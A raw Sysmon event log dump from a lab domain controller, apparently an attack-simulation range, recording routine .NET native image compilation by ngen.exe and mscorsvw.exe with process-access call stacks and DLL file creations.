13:51:39.990{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926B-6005-9B04-00000000A301}1404C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 
11241100x80000000000000008856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:39.834{59A5CD1D-9269-6005-9A04-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\3ec-0\System.Workflow.ComponentModel.dll2021-01-18 13:51:39.834 10341000x80000000000000008862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:40.100{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926C-6005-9C04-00000000A301}5016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:40.084{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-926C-6005-9C04-00000000A301}5016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:40.084{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926C-6005-9C04-00000000A301}5016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:40.006{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926B-6005-9B04-00000000A301}1404C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:41.834{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926D-6005-9E04-00000000A301}4604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:41.803{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-926D-6005-9E04-00000000A301}4604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:41.803{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926D-6005-9E04-00000000A301}4604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:41.412{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926D-6005-9D04-00000000A301}4528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:41.396{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-926D-6005-9D04-00000000A301}4528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:41.396{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926D-6005-9D04-00000000A301}4528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:41.287{59A5CD1D-926C-6005-9C04-00000000A301}5016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1398-0\System.Workflow.Runtime.dll2021-01-18 13:51:41.287 10341000x80000000000000008880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:42.959{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926E-6005-A104-00000000A301}2964C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:42.928{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-926E-6005-A104-00000000A301}2964C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:42.928{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926E-6005-A104-00000000A301}2964C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:42.865{59A5CD1D-926E-6005-A004-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1050-0\System.Xaml.Hosting.dll2021-01-18 13:51:42.865 10341000x80000000000000008876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:42.787{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926E-6005-A004-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:42.771{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-926E-6005-A004-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:42.771{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926E-6005-A004-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:42.725{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926E-6005-9F04-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:42.709{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-926E-6005-9F04-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:42.709{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926E-6005-9F04-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:42.615{59A5CD1D-926D-6005-9E04-00000000A301}4604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11fc-0\System.WorkflowServices.dll2021-01-18 13:51:42.615 10341000x80000000000000008900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:43.740{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926F-6005-A704-00000000A301}1464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:43.725{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-926F-6005-A704-00000000A301}1464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
